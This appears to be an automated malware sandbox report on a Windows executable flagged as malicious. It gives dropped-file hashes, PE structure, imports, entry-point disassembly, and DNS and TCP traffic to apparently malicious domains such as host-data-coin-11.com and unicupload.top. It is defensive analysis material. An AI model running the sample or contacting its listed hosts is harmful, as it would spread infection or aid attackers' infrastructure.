Preview: .... ... ....................................... ...!...............................(............................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................./_8..... .....0.~d............8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.2.0.1.1.5._.0.5.0.4.3.6._.6.0.7...e.t.l.........P.P.....(...........................................................................................................................................................................................................................................................................
C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe (copy)
Process:C:\Windows\SysWOW64\cmd.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):13666304
Entropy (8bit):3.7861536709741657
Encrypted:false
SSDEEP:6144:4vrN0pZXR3Srrj51BawxgIKP184NSWd2hQAjh3C:KrN0vR36TBHLY1JSWMQAt
MD5:5C50CF4AF77D12BF94B3FC09437C8B16
SHA1:C3D531F3C72F96EFCB00F932E744859755E88E54
SHA-256:43EF54A754F54F17F38D5D6AC207B1EF17953FD742A18124CCD2423E7E01B6F8
SHA-512:592FA7679DE8F8673287088C175EA7EB4D035B589F71C060F0151BF37FA4B55C13A96B8B214F26538768C1F64B891A9E5B7DFBF7481274F327C8CBC31518B296
Malicious:true
Reputation:unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L.....}`..........................................@........................................................................4...P.......(........................................................... ...@...............L............................text............................... ..`.data...............................@....yocinoj............................@....lebe...............................@....wuno...............................@....rsrc...(...........................@..@.reloc..ZF..........................@..B................................................................................................................................................................................................................................................................
C:\Windows\appcompat\Programs\Amcache.hve
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:MS Windows registry file, NT/2000 or above
Category:dropped
Size (bytes):1572864
Entropy (8bit):4.262263551383356
Encrypted:false
SSDEEP:12288:73ZKSZjdY1Nuot+yrYLwOFZcgSiIb7uMCTi3xzM2gdGX+oNU6iD+EVEV:7ZKSZjdY1Nuot+ybcY9V
MD5:BFF50EE8D271FF908B21241B2424A1E1
SHA1:67996C2F184A7B329E2C68781E7E354EB781D2FA
SHA-256:2881D8D250821B2B44ECA36D4FCAF909B998042A74FDBA62CEC164AFDCA8AE1E
SHA-512:72EA7560877C003AA5AF36379C5453EB6A18C6F30C67039B98EF38E2D98E980DC0E1A0F32D6035E31E454E707CC194DB77052E1CF5F55C319295381DB7B600BE
Malicious:false
Reputation:unknown
Preview: regfQ...Q...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmr.*x..................................................................................................................................................................................................................................................................................................................................................!%........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Windows\appcompat\Programs\Amcache.hve.LOG1
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:MS Windows registry file, NT/2000 or above
Category:dropped
Size (bytes):24576
Entropy (8bit):3.7779067348278756
Encrypted:false
SSDEEP:384:AkQAO25/ZrdtdXp55Qp8cXQnxOf2onPmxwpa5GjZmGhODTTV85N5i9zwbCeT:PPBr5XpEpQgf2o+xwpGWmGh0TVoN5kzE
MD5:953434AD47F5C2003B186C7B2E817D4F
SHA1:8568DEEB4E58E4CA8B05A9A8F870BC26F185A58A
SHA-256:ABB8237331BB32B29B72BC2DB4133432D9C4B42C16ACB4D87D26B3DC4DB08E37
SHA-512:03F8F26709DA5A97B466E784B96CC67F86B1D875CDCFDD558010CDFF168C42534F726059AC2FAC036F2789A931B59FFE8B95FDE2A2D7E83116ECBB4461930EE9
Malicious:false
Reputation:unknown
Preview: regfP...P...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmr.*x..................................................................................................................................................................................................................................................................................................................................................!%HvLE.^......P............}vp8.EJ.W!I.).Q............................. ..hbin................p.\..,..........nk,.s.*x.................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .s.*x........ ...........P............... .......Z.......................Root........lf......Root....nk .s.*x.....................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...
\Device\ConDrv
Process:C:\Windows\SysWOW64\netsh.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):3773
Entropy (8bit):4.7109073551842435
Encrypted:false
SSDEEP:48:VHILZNfrI7WFY32iIiNOmV/HToZV9It199hiALlIg39bWA1RvTBi/g2eB:VoLr0y9iIiNOoHTou7bhBlIydWALLt2w
MD5:DA3247A302D70819F10BCEEBAF400503
SHA1:2857AA198EE76C86FC929CC3388A56D5FD051844
SHA-256:5262E1EE394F329CD1F87EA31BA4A396C4A76EDC3A87612A179F81F21606ABC8
SHA-512:48FFEC059B4E88F21C2AA4049B7D9E303C0C93D1AD771E405827149EDDF986A72EF49C0F6D8B70F5839DCDBD6B1EA8125C8B300134B7F71C47702B577AD090F8
Malicious:false
Reputation:unknown
Preview: ..A specified value is not valid.....Usage: add rule name=<string>.. dir=in|out.. action=allow|block|bypass.. [program=<program path>].. [service=<service short name>|any].. [description=<string>].. [enable=yes|no (default=yes)].. [profile=public|private|domain|any[,...]].. [localip=any|<IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway|.. <IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [localport=0-65535|<port range>[,...]|RPC|RPC-EPMap|IPHTTPS|any (default=any)].. [remoteport=0-65535|<port range>[,...]|any (default=any)].. [protocol=0-255|icmpv4|icmpv6|icmpv4:type,code|icmpv6:type,code|.. tcp|udp|any (default=any)].. [interfacetype=wireless|lan|ras|any].. [rmtcomputergrp=<SDDL string>].. [rmtusrgrp=<SDDL string>].. [edge=yes|deferapp|deferuser|no (default=no)].. [security=authenticate|authenc|authdynenc|authnoencap|

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.6910111765717115
TrID:
• Win32 Executable (generic) a (10002005/4) 99.83%
• Windows Screen Saver (13104/52) 0.13%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:OG9rNsihJ7.exe
File size:321024
MD5:5c7b46771055043f59e0451a342b7ed1
SHA1:5362af084622dc8efc661c703d4c7c5dd6839be1
SHA256:0245c82558329cfd8ef5ef901e4929075d4d873ba20d9704731758580caed7be
SHA512:f16fdd7212bc64f05ef67b41e29dd8966645b7fa0e7d78e8883503503a3589a090c54846500925f17b8dd1d133e1f5bb37bbde16f3e5c50864847c17f7df2c06
SSDEEP:6144:1dNi2kGfRHG5p1JX9BnaPGMq3yvNITJwD3EsG1ALc:XNsGfIfnpBCvuJw4sG+
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,...~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L.....h_...........................

File Icon

Icon Hash:c8d0d8e0f0e0e4e0

Static PE Info

General

Entrypoint:0x41b5e0
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:0x5F68D411 [Mon Sep 21 16:25:53 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:0
File Version Major:5
File Version Minor:0
Subsystem Version Major:5
Subsystem Version Minor:0
Import Hash:6801e04a0c2ca60ac2497c0d8723846b

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
call 00007F7D5CDB513Bh
call 00007F7D5CDA80B6h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
push FFFFFFFEh
push 0043DBD8h
push 0041E7C0h
mov eax, dword ptr fs:[00000000h]
push eax
add esp, FFFFFF94h
push ebx
push esi
push edi
mov eax, dword ptr [00440354h]
xor dword ptr [ebp-08h], eax
xor eax, ebp
push eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
mov dword ptr [ebp-18h], esp
mov dword ptr [ebp-70h], 00000000h
mov dword ptr [ebp-04h], 00000000h
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [0040109Ch]
mov dword ptr [ebp-04h], FFFFFFFEh
jmp 00007F7D5CDA80C8h
mov eax, 00000001h
ret
mov esp, dword ptr [ebp-18h]
mov dword ptr [ebp-78h], 000000FFh
mov dword ptr [ebp-04h], FFFFFFFEh
mov eax, dword ptr [ebp-78h]
jmp 00007F7D5CDA81F7h
mov dword ptr [ebp-04h], FFFFFFFEh
call 00007F7D5CDA8234h
mov dword ptr [ebp-6Ch], eax
push 00000001h
call 00007F7D5CDB5B1Ah
add esp, 04h
test eax, eax
jne 00007F7D5CDA80ACh
push 0000001Ch
call 00007F7D5CDA81ECh
add esp, 04h
                                                                                                                      call 00007F7D5CDB1194h
                                                                                                                      test eax, eax
                                                                                                                      jne 00007F7D5CDA80ACh
                                                                                                                      push 00000010h

Rich Headers

Programming Language:
• [ C ] VS2008 build 21022
• [IMP] VS2005 build 50727
• [ASM] VS2008 build 21022
• [LNK] VS2008 build 21022
• [RES] VS2008 build 21022
• [C++] VS2008 build 21022

Data Directories

Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x3e304         | 0x50         | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x150000        | 0x8728       | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x159000        | 0x1df4       | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x13a0          | 0x1c         | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x9100          | 0x40         | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x1000          | 0x34c        | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |

Sections

Name     | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity  | File Type | Entropy       | Characteristics
.text    | 0x1000          | 0x3e6be      | 0x3e800  | False    | 0.58234375       | data      | 6.96452184589 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data    | 0x40000         | 0x10c988     | 0x1800   | False    | 0.340494791667   | data      | 3.46807929414 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.zafif   | 0x14d000        | 0x5          | 0x200    | False    | 0.02734375       | data      | 0.0           | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.naladin | 0x14e000        | 0xea         | 0x200    | False    | 0.02734375       | data      | 0.0           | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ger     | 0x14f000        | 0xd93        | 0xe00    | False    | 0.00697544642857 | data      | 0.0           | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc    | 0x150000        | 0x8728       | 0x8800   | False    | 0.594841452206   | data      | 5.84519780089 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc   | 0x159000        | 0x465a       | 0x4800   | False    | 0.346137152778   | data      | 3.69349629733 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name                | RVA      | Size  | Type                                                                                  | Language | Country
AFX_DIALOG_LAYOUT   | 0x157048 | 0x2   | data                                                                                  | Dutch    | Netherlands
AFX_DIALOG_LAYOUT   | 0x157040 | 0x2   | data                                                                                  | Dutch    | Netherlands
AFX_DIALOG_LAYOUT   | 0x157050 | 0x2   | data                                                                                  | Dutch    | Netherlands
AFX_DIALOG_LAYOUT   | 0x157058 | 0x2   | data                                                                                  | Dutch    | Netherlands
CIDAFICUDUROSOTAROM | 0x156628 | 0x6c7 | ASCII text, with very long lines, with no line terminators                            | Assamese | India
VIDIWAYAPENIGU      | 0x156cf0 | 0x2fa | ASCII text, with very long lines, with no line terminators                            | Assamese | India
RT_CURSOR           | 0x157060 | 0x8a8 | dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"        | Dutch    | Netherlands
RT_ICON             | 0x150740 | 0x6c8 | data                                                                                  | Assamese | India
RT_ICON             | 0x150e08 | 0x568 | GLS_BINARY_LSB_FIRST                                                                  | Assamese | India
RT_ICON             | 0x151370 | 0x10a8 | data                                                                                 | Assamese | India
RT_ICON             | 0x152418 | 0x988 | dBase III DBT, version number 0, next free block index 40                             | Assamese | India
RT_ICON             | 0x152da0 | 0x468 | GLS_BINARY_LSB_FIRST                                                                  | Assamese | India
RT_ICON             | 0x153258 | 0x8a8 | data                                                                                  | Assamese | India
RT_ICON             | 0x153b00 | 0x6c8 | data                                                                                  | Assamese | India
RT_ICON             | 0x1541c8 | 0x568 | GLS_BINARY_LSB_FIRST                                                                  | Assamese | India
RT_ICON             | 0x154730 | 0x10a8 | data                                                                                 | Assamese | India
RT_ICON             | 0x1557d8 | 0x988 | data                                                                                  | Assamese | India
RT_ICON             | 0x156160 | 0x468 | GLS_BINARY_LSB_FIRST                                                                  | Assamese | India
RT_STRING           | 0x157920 | 0xe4  | data                                                                                  | Dutch    | Netherlands
RT_STRING           | 0x157a08 | 0x3bc | data                                                                                  | Dutch    | Netherlands
RT_STRING           | 0x157dc8 | 0x6e6 | data                                                                                  | Dutch    | Netherlands
RT_STRING           | 0x1584b0 | 0x1a0 | data                                                                                  | Dutch    | Netherlands
RT_STRING           | 0x158650 | 0xd8  | data                                                                                  | Dutch    | Netherlands
RT_ACCELERATOR      | 0x157000 | 0x10  | data                                                                                  | Dutch    | Netherlands
RT_ACCELERATOR      | 0x156ff0 | 0x10  | data                                                                                  | Dutch    | Netherlands
RT_GROUP_CURSOR     | 0x157908 | 0x14  | data                                                                                  | Dutch    | Netherlands
RT_GROUP_ICON       | 0x153208 | 0x4c  | data                                                                                  | Assamese | India
RT_GROUP_ICON       | 0x1565c8 | 0x5a  | data                                                                                  | Assamese | India
None                | 0x157020 | 0xa   | data                                                                                  | Dutch    | Netherlands
None                | 0x157030 | 0xa   | data                                                                                  | Dutch    | Netherlands
None                | 0x157010 | 0xa   | data                                                                                  | Dutch    | Netherlands

Imports

DLL          | Import
KERNEL32.dll | DeactivateActCtx, GetVersionExW, SetConsoleCP, GetConsoleAliasesLengthA, GetDefaultCommConfigA, FindFirstFileExW, GetDriveTypeA, FreeEnvironmentStringsA, SetProcessPriorityBoost, SetVolumeMountPointW, GetLongPathNameW, CopyFileA, TlsGetValue, GetConsoleCursorInfo, SetComputerNameExA, SystemTimeToTzSpecificLocalTime, FindAtomA, ReleaseSemaphore, CallNamedPipeA, CreateMailslotA, BuildCommDCBAndTimeoutsW, VirtualProtect, LoadLibraryA, LocalAlloc, TryEnterCriticalSection, GetCommandLineW, InterlockedDecrement, GetCalendarInfoA, DeleteFileA, CreateActCtxW, CreateRemoteThread, SetSystemTimeAdjustment, SetPriorityClass, WritePrivateProfileStringW, GetProcessHeap, GlobalUnWire, ReadConsoleOutputCharacterW, GetStartupInfoW, GetDiskFreeSpaceExA, GetCPInfoExA, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetLastError, GetProfileStringW, WriteProfileSectionW, GetProfileStringA, SetLastError, DeleteVolumeMountPointA, DebugBreak, lstrcmpA, ReadFileScatter, SetConsoleMode, GetVersion, GetSystemWindowsDirectoryW, GlobalFindAtomA, FindCloseChangeNotification, GetTapeParameters, SetMailslotInfo, InterlockedExchange, DefineDosDeviceW, FindVolumeMountPointClose, EndUpdateResourceA, WriteConsoleA, GetSystemTimeAdjustment, WritePrivateProfileSectionA, GetPrivateProfileStructW, GetFileAttributesExA, MoveFileW, GetVolumePathNameA, HeapUnlock, lstrcmpW, SetDefaultCommConfigW, GetExitCodeProcess, ResetEvent, GetThreadContext, MoveFileExW, GetProcAddress, GlobalLock, UnregisterWaitEx, BuildCommDCBW, PeekConsoleInputW, GetBinaryTypeW, CreateSemaphoreW, TransmitCommChar, WaitNamedPipeA, GetOverlappedResult, GetPrivateProfileSectionNamesW, FindResourceExW, EnumTimeFormatsW, GetLocalTime, CreateSemaphoreA, FreeEnvironmentStringsW, GetPrivateProfileSectionW, SetFileShortNameA, lstrcpyA, VerLanguageNameW, SetThreadExecutionState, SetSystemTime, LockFile, VerSetConditionMask, GetConsoleAliasA, FlushConsoleInputBuffer, FreeConsole, GetAtomNameW, GetConsoleAliasExesLengthA, WriteConsoleInputW, TransactNamedPipe, EnumDateFormatsA, SetCommState, FileTimeToLocalFileTime, _lopen, GetConsoleAliasExesLengthW, GetWriteWatch, GetModuleHandleW, WriteConsoleOutputCharacterA, GetConsoleMode, HeapFree, OpenMutexA, LocalLock, GetCommMask, SetEndOfFile, FindClose, CreateIoCompletionPort, SetFileApisToANSI, CancelWaitableTimer, GetProcessHandleCount, UnregisterWait, GetConsoleAliasesLengthW, GetCurrentProcessId, lstrcpynA, SetNamedPipeHandleState, GetCompressedFileSizeA, FindNextVolumeMountPointW, GetFullPathNameA, WriteProfileStringA, DeleteAtom, GlobalAddAtomW, AssignProcessToJobObject, QueryDosDeviceW, InitializeCriticalSection, Process32NextW, SetCurrentDirectoryA, GetBinaryTypeA, FindActCtxSectionGuid, TerminateProcess, MoveFileA, RaiseException, HeapValidate, IsBadReadPtr, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, GetModuleHandleA, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, InterlockedIncrement, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, Sleep, ExitProcess, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetEnvironmentStringsW, HeapDestroy, HeapCreate, VirtualFree, GetModuleFileNameA, WriteFile, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, RtlUnwind, InitializeCriticalSectionAndSpinCount, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, LoadLibraryW, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, WideCharToMultiByte, LCMapStringA, LCMapStringW, GetLocaleInfoA, SetFilePointer, GetConsoleCP, FlushFileBuffers, SetStdHandle, GetConsoleOutputCP, CloseHandle, CreateFileA
USER32.dll   | OemToCharA
ADVAPI32.dll | GetFileSecurityA

Possible Origin

Language of compilation system | Country where language is spoken
Dutch                          | Netherlands
Assamese                       | India

Network Behavior

Network Port Distribution

TCP Packets

                                                                                                                      Jan 14, 2022 21:04:59.370313883 CET80497758.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:59.686207056 CET4977680192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:59.703638077 CET80497768.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:59.703731060 CET4977680192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:59.703854084 CET4977680192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:59.703890085 CET4977680192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:59.721941948 CET80497768.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:59.844403982 CET80497768.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:59.847476006 CET4977680192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:59.847769022 CET4977680192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:59.865098953 CET80497768.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:05:00.177220106 CET4977980192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:05:00.194587946 CET80497798.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:05:00.194685936 CET4977980192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:05:00.194861889 CET4977980192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:05:00.253149986 CET80497798.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:05:00.295578957 CET80497798.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:05:00.295605898 CET80497798.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:05:00.295623064 CET80497798.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:05:00.295634985 CET80497798.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:05:00.295651913 CET80497798.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:05:00.295667887 CET80497798.209.70.0192.168.2.5

                                                                                                                      DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 14, 2022 21:04:55.877932072 CET | 192.168.2.5 | 8.8.8.8 | 0x7494 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:04:56.323577881 CET | 192.168.2.5 | 8.8.8.8 | 0x4933 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:04:56.493093014 CET | 192.168.2.5 | 8.8.8.8 | 0xe41d | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:04:56.927520037 CET | 192.168.2.5 | 8.8.8.8 | 0xf2bd | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:04:57.367894888 CET | 192.168.2.5 | 8.8.8.8 | 0x4af2 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:04:57.536972046 CET | 192.168.2.5 | 8.8.8.8 | 0x1f4c | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:04:59.186599016 CET | 192.168.2.5 | 8.8.8.8 | 0xd444 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:04:59.364273071 CET | 192.168.2.5 | 8.8.8.8 | 0x992b | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:04:59.856811047 CET | 192.168.2.5 | 8.8.8.8 | 0x1977 | Standard query (0) | data-host-coin-8.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:02.046914101 CET | 192.168.2.5 | 8.8.8.8 | 0x7b24 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:02.222532988 CET | 192.168.2.5 | 8.8.8.8 | 0xf3bf | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:02.713391066 CET | 192.168.2.5 | 8.8.8.8 | 0x3fda | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:03.289355993 CET | 192.168.2.5 | 8.8.8.8 | 0xb555 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:03.469676971 CET | 192.168.2.5 | 8.8.8.8 | 0xea8f | Standard query (0) | privacy-tools-for-you-780.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:05.988169909 CET | 192.168.2.5 | 8.8.8.8 | 0x14b4 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:06.242278099 CET | 192.168.2.5 | 8.8.8.8 | 0xadd5 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:07.186929941 CET | 192.168.2.5 | 8.8.8.8 | 0x7f70 | Standard query (0) | unicupload.top | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:07.427100897 CET | 192.168.2.5 | 8.8.8.8 | 0x3d00 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:07.655709982 CET | 192.168.2.5 | 8.8.8.8 | 0x147d | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:07.846596956 CET | 192.168.2.5 | 8.8.8.8 | 0x31d8 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:08.083580971 CET | 192.168.2.5 | 8.8.8.8 | 0xb57c | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:08.250816107 CET | 192.168.2.5 | 8.8.8.8 | 0x9388 | Standard query (0) | data-host-coin-8.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:10.244743109 CET | 192.168.2.5 | 8.8.8.8 | 0xf22f | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:10.415355921 CET | 192.168.2.5 | 8.8.8.8 | 0x2e3a | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:10.582473040 CET | 192.168.2.5 | 8.8.8.8 | 0x11d1 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:10.776063919 CET | 192.168.2.5 | 8.8.8.8 | 0xe372 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:13.304208040 CET | 192.168.2.5 | 8.8.8.8 | 0x55 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:13.750782013 CET | 192.168.2.5 | 8.8.8.8 | 0xf6a9 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:13.945065975 CET | 192.168.2.5 | 8.8.8.8 | 0x3e41 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:14.142004967 CET | 192.168.2.5 | 8.8.8.8 | 0x7e8a | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:16.810718060 CET | 192.168.2.5 | 8.8.8.8 | 0x780d | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:16.979959965 CET | 192.168.2.5 | 8.8.8.8 | 0x5162 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:17.161175013 CET | 192.168.2.5 | 8.8.8.8 | 0xdbe6 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:28.889240980 CET | 192.168.2.5 | 8.8.8.8 | 0xc6ab | Standard query (0) | microsoft-com.mail.protection.outlook.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:31.535420895 CET | 192.168.2.5 | 8.8.8.8 | 0xd6fa | Standard query (0) | patmushta.info | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:38.788865089 CET | 192.168.2.5 | 8.8.8.8 | 0x5d88 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:38.973396063 CET | 192.168.2.5 | 8.8.8.8 | 0xc0e2 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:39.412410975 CET | 192.168.2.5 | 8.8.8.8 | 0x35d4 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:39.601656914 CET | 192.168.2.5 | 8.8.8.8 | 0xda93 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:40.071396112 CET | 192.168.2.5 | 8.8.8.8 | 0x6de5 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:40.235871077 CET | 192.168.2.5 | 8.8.8.8 | 0x6600 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:40.415290117 CET | 192.168.2.5 | 8.8.8.8 | 0xc569 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
